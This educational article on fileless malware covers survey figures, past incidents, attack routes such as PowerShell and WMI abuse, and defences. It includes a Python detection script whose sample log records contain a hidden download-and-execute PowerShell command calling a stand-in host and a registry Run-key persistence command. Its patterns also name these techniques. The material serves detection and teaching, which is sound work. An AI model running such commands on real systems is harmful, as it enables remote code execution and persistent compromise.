The most basic fact about fileless malware is that, unlike other malware, it leaves little or no footprint on disk. It uses tools built into the operating system so that the attack blends into the normal functioning of the system. Without using traditional executable files as its point of entry, fileless malware often hides in memory or in other places where it is difficult to detect. From its hiding point, it operates directly in RAM or joins other attack vectors like ransomware or spyware to accomplish its goal. Because it runs in RAM and writes nothing to disk, it leaves no file traces and thus evades antivirus software that relies on scanning files on disk.
Cybersecurity is on high alert due to rising invisible malware attacks
Carbon Black reported striking figures on fileless malware attacks from a survey of security researchers [1]. Highlights from the survey:
- 93% consider fileless malware attacks more threatening than other cyber attacks.
- 64% confirmed that they are experiencing an increasing number of fileless attacks.
- 62% of fileless malware attacks are induced to compromise customer data.
The most common types of fileless malware attacks reported were:

| Remote logins | WMI-based attacks | In-memory attacks | PowerShell-based attacks | Microsoft Office macro attacks |
| --- | --- | --- | --- | --- |
| 54% | 41% | 39% | 34% | 31% |

Data targeted by these attacks:

| Corporate IP | Credentials | Financial data |
| --- | --- | --- |
| 53% | 42% | 41% |
Fileless malware attacks are not new; the techniques used in them date back to the early 2000s. The SQL Slammer worm, identified in 2003, infected thousands of computers on a network in less than a minute and was a fileless malware attack [3]. Since then, the number of attacks has only increased, as has the damage caused.
A report from SentinelOne shows fileless malware attacks rising while ransomware attacks declined in the first half of 2018 [4].
Further, fileless malware accounts for 42 out of every 1,000 endpoint attacks. It may not take long for this malware to grow beyond enterprise networks and impact everyone.
Another example of a fileless malware attack is the theft of $8 million in cash overnight from ATMs in Russia using a “disappearing malware.” The malware was so named because there were no signs of any malicious files on the machines or on the bank's network. CCTV footage showed the attacker withdrawing money from the ATMs without even touching them [5].
Fileless malware is only becoming more sophisticated: attackers now place a script in the registry that reinstates the malicious code even after the machine is powered down and restarted. Malware authors are also developing techniques that combine this approach with data encryption and ransomware [6]. If successful, these attacks can be devastating.
How does a fileless malware attack happen?
Potential attack scenarios for fileless malware:
- Malicious code is injected into already installed, legitimate applications such as a web browser or Microsoft Word, and the malicious code is then executed.
- A file that appears legitimate loads a link into memory, and a script then executes the attack remotely. This is usually done to locate confidential data.
- Built-in administrative tools such as Microsoft PowerShell and Microsoft Windows Management Instrumentation (WMI) scripting are abused to get the script to run remotely.
- Phishing emails, malvertising, and malicious downloads are common ways of spreading fileless malware.
- It can be hosted on a website, from where it is allowed to run in the browser's memory and spread to cause havoc on your system.
On the whole, there is no malicious program or file that you can find installed separately on your hard drive, and this is what makes fileless malware a tricky attack to handle. Once the malware is in your system, it can abuse legitimate administration tools and software to gain privileges and spread. Another important observation is that the attacker doesn't have to worry about sneaking a malicious program past antivirus and security software, because changes made only in memory are not visible to sensors that scan files on disk.
The Equifax breach is an example of a fileless attack, as it used a command injection vulnerability in Apache Struts. Satya Gupta, Founder and CTO at Virsec Systems, Inc., said: “In this type of attack, a vulnerable application does not adequately validate users’ input, which may contain operating system commands. As a result, these commands can get executed on the victim machine with the same privileges as those of the vulnerable application.” [2]
Protection from fileless malware attacks
As the cybersecurity industry becomes more responsive to exploits, the lifespan of fileless attacks is shrinking. The simplest way to defend your system from fileless malware is to keep your software up to date. This includes basic software such as the Microsoft 365 suite, which comes with an upgraded Windows Defender package that can detect irregular activity.
Another way to counteract fileless attacks is to address the entire threat lifecycle. A multi-layer defense strategy is again good practice, as it enables you to investigate every phase of a campaign before, during, and after an attack.
Two key capabilities –
- Ability to observe and measure: you should be able to discover the key techniques used during the attack, access aggregated threat data, monitor PowerShell and other scripting engines, and track user activity.
- Ability to control the victim system: you should be able to shut down the running processes and isolate the infected system from the network.
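The "observe and measure" capability above, and the earlier point about scripts planted in the registry to survive a reboot, both come down to watching what the scripting engines actually run. The script below is an added example (not code from the original article or from any vendor it mentions): a small triage pass in Python over constructed PowerShell script-block log records, standing in for what a SIEM rule or endpoint sensor would do. It decodes `-EncodedCommand` payloads before matching, because rules that only look at the raw command line miss everything hidden behind the encoding. The sample records, host and user names, the `example.invalid` URL, and the indicator names are all constructed for this example.

```python
"""
Added example (not part of the original article): a small triage script that
scans constructed PowerShell script-block log records for indicators commonly
associated with fileless tradecraft, namely encoded commands, in-memory
download-and-execute patterns, WMI process creation, and writes to the registry
autorun key that attackers use to survive a reboot.
"""
import base64
import re
from typing import Optional

# Matches "-EncodedCommand <base64>" and its short forms (-e, -ec, -enc).
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Indicator name -> pattern. These are triage hints, not proof of compromise.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression",
        re.IGNORECASE,
    ),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.IGNORECASE),
    "autorun_registry_write": re.compile(
        r"(?:Set-ItemProperty|New-ItemProperty|reg(?:\.exe)?\s+add).*CurrentVersion\\Run",
        re.IGNORECASE,
    ),
    "wmi_process_create": re.compile(r"Win32_Process.*\bCreate\b", re.IGNORECASE),
}


def encode_ps(command: str) -> str:
    """PowerShell expects -EncodedCommand payloads as base64 of UTF-16LE text.
    Used here only to construct a realistic sample record."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(script: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none
    or it is not valid base64/UTF-16LE."""
    match = ENCODED_RE.search(script)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_record(record: dict) -> dict:
    """Score one log record. Both the logged text and, when present, the decoded
    payload are scanned, so indicators hidden behind -EncodedCommand still fire."""
    script = record["script"]
    decoded = decode_encoded_command(script)
    text = script if decoded is None else script + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    severity = "high" if len(hits) >= 2 else "medium" if hits else "none"
    return {
        "host": record["host"],
        "user": record["user"],
        "indicators": hits,
        "decoded": decoded,
        "severity": severity,
    }


def triage(records: list) -> list:
    """Return findings for every record with at least one indicator."""
    return [r for r in map(analyze_record, records) if r["indicators"]]


# Constructed sample records. In practice these would come from the
# Microsoft-Windows-PowerShell/Operational channel (script block logging) or a SIEM.
SAMPLE_RECORDS = [
    {"host": "ws01", "user": "alice",
     "script": r"Get-ChildItem C:\Reports | Measure-Object"},
    {"host": "ws02", "user": "bob",
     "script": "powershell.exe -NoP -W Hidden -EncodedCommand "
               + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"host": "ws03", "user": "carol",
     "script": r"Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run "
               r"-Name Updater -Value 'powershell -NoProfile -File C:\Users\Public\u.ps1'"},
    {"host": "ws04", "user": "dave",
     "script": r"Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe'"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(f"{finding['severity']:6} {finding['host']}/{finding['user']}: "
              f"{', '.join(finding['indicators'])}")
```

Run as-is, it reports the three suspicious records and leaves the benign directory listing alone. The patterns are deliberately coarse: `Invoke-WebRequest` and registry Run-key writes also occur in legitimate administration, so in production the severity step would be tuned per environment and joined with the user and process context that the "track user activity" point above calls for.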
A successful fileless attack is hard to identify until it has done its damage. The future of fileless attacks may be worse as attackers go beyond evasion and use the registry to persist after the system reboots.
With this article, we have come to the end of the series on malware attacks. We are sure that the entire collection of writeups will have inspired you to become a cyber enthusiast. If you are planning to make your career in cybersecurity, then you should join our online Bachelor of Science in Cybersecurity (BSCS) program or the Master of Science in Cybersecurity (MSCS). Both programs are completely online, instructor-paced, and two years in duration.
Sources:
[1] https://www.carbonblack.com/resources/definitions/what-is-fileless-malware/
[2] https://www.csoonline.com/article/3227046/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html
[3] http://news.bbc.co.uk/2/hi/technology/2693925.stm
[4] https://threatpost.com/threatlist-ransomware-attacks-down-fileless-malware-up-in-2018/136962/
[5] https://www.vice.com/en_us/article/538ebn/atm-hack-russia-disappearing-malware
[6] https://www.malwarefox.com/fileless-malware/